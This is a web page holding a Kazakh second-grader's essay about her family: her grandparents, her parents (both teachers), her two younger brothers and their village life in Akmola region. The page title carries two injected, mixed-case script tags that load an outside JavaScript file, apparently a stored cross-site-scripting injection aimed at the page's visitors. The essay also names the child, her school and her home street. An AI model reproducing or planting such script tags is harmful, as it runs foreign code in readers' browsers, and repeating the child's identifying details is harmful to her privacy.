Шығарма: Отбасы дегеніміз не?<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

20.01.2020

      «Отбасы» дегеніміз – бірлесіп күн көретін, туыстық қатынаста тұратын адамдар тобы. Отбасы – сыйластық, жарастық орнаған орта, кішкентай Отан.

«Отан – отбасынан басталады» дегендей Отанды сүю – отбасынан басталатыны рас! Себебі, отбасы – бала тәрбиесінің ең алғашқы ұжымы. Осы шағын түсініктемеге орай, мен өз отбасым туралы шағын әңгімелеп берсем, отбасымның мекенжайы: Ақмола облысы, Жақсы ауданы, Жаңақима ауылы, Панфилова көшесі. Менің сүйікті отбасым киелі жеті саны, жеті адамнан тұрамыз. Аташым, әжетайым, әкешім, анашым, әкешім мен анашымның тұңғышы және аташым мен әжетайымның ең алғашқы сүйкімді де сүйікті немересі Кәусармын, соңымнан ерген екі бауырым-інішектерім Әрсен және тәп-тәтті қылықтары бар Нұрәли бармыз.

Аллаға шүкір, тәубе деймін осындай тату-тәтті бір отбасы құрылғанына. Отбасымызда үлкен сыйластық орнаған. Аташым көктем, жаз, күз мезгілінде егін салу, егін ору, шөп шабу науқанында жұмыс жасайды да, қыс мезгілінде үйде, үйдің тірлігін жасайды. Мысалы, қорадағы мал күтімі бар және ауладағы қарды тазалап қояды. Әжетайым Ғ.Әбдірахманұлы атындағы Қима орта мектебінде 25 жылдан астам бастауыш сынып мұғалімі қызметін атқарып жүр. Әкешім сол мектепте денешынықтыру сабағының ұстазы, әрі қазақ күресінің спортшысы, келер ұрпаққа бапкер. Анашым ауылымыздың К. Ускенбаев атындағы орта мектебінің ағылшын тілі пәнінің мұғалімі. Інішегім Әрсен , мектепалды даярлық сыныбында оқып жүр, ал кіші інішегім Нұрәли «Құлыншақ» балабақшасының тәрбиеленушісі.

Мен өз отбасымды мақтан тұтамын. Себебі, осындай адамгершілігі мол, әдет – ғұрыпты ұстана білген, сыйластығы жарасқан отбасында дүниеге келгеніме қуанамын. Сол қуанышым ұзағынан болса екен деп тілеймін.

 

Орындаған: Рамазан Кәусар Дәулетқызы

Ғ.Әбдірахманұлы атындағы

Қима орта мектебінің 2-ші сынып оқушысы

Просмотров: 595


Пікір қосу



Деректерді қолтаңбаға қосу